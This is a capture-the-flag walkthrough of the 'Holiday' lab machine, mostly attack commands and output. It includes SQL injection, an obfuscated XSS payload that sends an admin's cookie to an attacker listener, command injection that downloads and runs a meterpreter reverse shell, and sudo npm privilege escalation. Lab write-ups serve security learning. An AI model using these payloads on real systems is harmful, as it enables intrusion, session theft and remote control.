Difficulty Rating:

Machine: Holiday
OS: Linux
Target IP: 10.10.10.25
Source IP: 10.10.15.8

  • Nmap
$ nmap -A -sV -Pn -O -oN holiday_nmap.txt 10.10.10.25

# Nmap 7.60 scan initiated Mon Aug 21 11:07:46 2017 as: nmap -A -sV -Pn -O -oN holiday_nmap.txt 10.10.10.25
Nmap scan report for 10.10.10.25
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c3:aa:3d:bd:0e:01:46:c9:6b:46:73:f3:d1:ba:ce:f2 (RSA)
|   256 b5:67:f5:eb:8d:11:e9:0f:dd:f4:52:25:9f:b1:2f:23 (ECDSA)
|_  256 79:e9:78:96:c5:a8:f4:02:83:90:58:3f:e5:8d:fa:98 (EdDSA)
8000/tcp open  http    Node.js Express framework
|_http-title: Error
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=8/21%OT=22%CT=1%CU=36959%PV=Y%DS=2%DC=T%G=Y%TM=599A71D
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:06%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=109%TI=Z%TS=8)
OS:OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54D
OS:ST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
OS:ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   175.31 ms 10.10.14.1
2   179.22 ms 10.10.10.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 21 11:08:32 2017 -- 1 IP address (1 host up) scanned in 46.45 seconds

  • Ports 8000 and 22 are open
  • Dirsearch
$ python3 ~/dirsearch/dirsearch.py -u http://10.10.10.25:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -r -f -t 100 --plain-text-report=holiday_dirsearch01.txt

301   165B   http://10.10.10.25:8000/img
200   621B   http://10.10.10.25:8000/
200     1KB  http://10.10.10.25:8000/login
302    28B   http://10.10.10.25:8000/admin
301   165B   http://10.10.10.25:8000/css
200     1KB  http://10.10.10.25:8000/Login
301   163B   http://10.10.10.25:8000/js
302    28B   http://10.10.10.25:8000/logout
302    28B   http://10.10.10.25:8000/agent
302    28B   http://10.10.10.25:8000/Admin
302    28B   http://10.10.10.25:8000/Logout
200   621B   http://10.10.10.25:8000/
200     1KB  http://10.10.10.25:8000/LogIn
302    28B   http://10.10.10.25:8000/Agent
200     1KB  http://10.10.10.25:8000/LOGIN
  • When you enter username as username and password as password, you get username to be RickA

  • SQLmap

$ sqlmap -r holiday_post_request.txt --level 5 --risk 3 --dump-all --threads=10

+----+--------+----------+----------------------------------+
| id | active | username | password                         |
+----+--------+----------+----------------------------------+
| 1  | 1      | RickA    | fdc8cd4cff2c19e0d1022e78481ddf36 |
+----+--------+----------+----------------------------------+
  • Go to https://hashkiller.co.uk/md5-decrypter.aspx and find hash value
  • Hash value is: nevergonnagiveyouup
  • Login using username:RickA and password:nevergonnagiveyouup
  • User Cookie: connect.sid=s:b51686d0-8708-11e7-abf7-238ba7a6e637.l/GbNaPbN93vtrG3O1WzBUCTL0kG/Z6eg+2InuPb2Mo

  • To get admin’s cookie:
    • Login using above username and password.
    • Visit one of the UUIDs. We’ll visit: http://10.10.10.25:8000/vac/8dd841ff-3f44-4f2b-9324-9a833e2c6b65
    • The notes section is vulnerable to XSS
    • Start nc to listen with port 4567:nc -nvlp 4567
    • Enter the below code in notes:
      <img src="x/><script>eval(String.fromCharCode(118, 97, 114, 32, 117, 114, 108, 32, 61, 32, 34, 104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 48, 48, 47, 118, 97, 99, 47, 56, 100, 100, 56, 52, 49, 102, 102, 45, 51, 102, 52, 52, 45, 52, 102, 50, 98, 45, 57, 51, 50, 52, 45, 57, 97, 56, 51, 51, 101, 50, 99, 54, 98, 54, 53, 34, 59, 32, 36, 46, 97, 106, 97, 120, 40, 123, 32, 109, 101, 116, 104, 111, 100, 58, 32, 34, 71, 69, 84, 34, 44, 117, 114, 108, 58, 32, 117, 114, 108, 44, 115, 117, 99, 99, 101, 115, 115, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 100, 97, 116, 97, 41, 32, 123, 32, 36, 46, 112, 111, 115, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 49, 48, 46, 49, 48, 46, 49, 53, 46, 53, 51, 58, 52, 53, 54, 55, 47, 34, 44, 32, 100, 97, 116, 97, 41, 59, 125, 125, 41, 59));</script>">
    
    • After few seconds you’ll get a request on your listener.
    • It contains the admin cookie
  • Admin Cookie:
connect.sid=s%3A125ed5c0-93b8-11e7-b36a-63cfaaf6bfb4.QhCcyezXRvtUrcLBOWG%2BmK%2B53mKvdVCLbC5owsYs68g
  • After getting admin cookie, login as admin and goto http://10.10.10.25:8000/admin
  • This page contains RCE. The RCE can be exploited as follows:
    /admin/export?table=bookings%26ls
    
  • This will execute ls command

Note: %26 instead of & is required because & is filtered

  • View the output in burp or view source code
  • In this way, uplaod the payload.
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHSOT=10.10.15.53 LPORT=4444 -f elf > shell
$ sudo python -m SimpleHTTPServer 80 
Serving HTTP on 0.0.0.0 port 80 ...
  • Start exploit/multi/handler from msf

  • Execute these commands on browser or burp repeater

 /admin/export?table=bookings%26cd+/tmp%26%26wget+168431413/shellpt
 /admin/export?table=bookings%26chmod+777+/tmp/shellpt
 /admin/export?table=bookings%26/tmp/shellpt
  • You get shell, you get user.txt

User Owned!

[email protected]:/home/algernon/app$ sudo -l 
Matching Defaults entries for algernon on holiday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User algernon may run the following commands on holiday:
    (ALL) NOPASSWD: /usr/bin/npm i *

[email protected]:/home/algernon/app$ mv package.json package.json.bak
[email protected]:/home/algernon/app$ ln -s /root/root.txt package.json && sudo /usr/bin/npm i *

npm ERR! Linux 4.4.0-78-generic
npm ERR! argv "/usr/bin/nodejs" "/usr/bin/npm" "i" "hex.db" "index.js" "layouts" "node_modules" "npm-debug.log" "package.json" "package.json.bak" "setup" "static" "views"
npm ERR! node v6.10.3
npm ERR! npm  v3.10.10
npm ERR! file /home/algernon/app/package.json
npm ERR! code EJSONPARSE

npm ERR! Failed to parse json
npm ERR! Unexpected token 'a' at 1:1
npm ERR! {root-flag}
npm ERR! ^
npm ERR! File: /home/algernon/app/package.json
npm ERR! Failed to parse package.json data.
User and Root owned!!

Share the fun!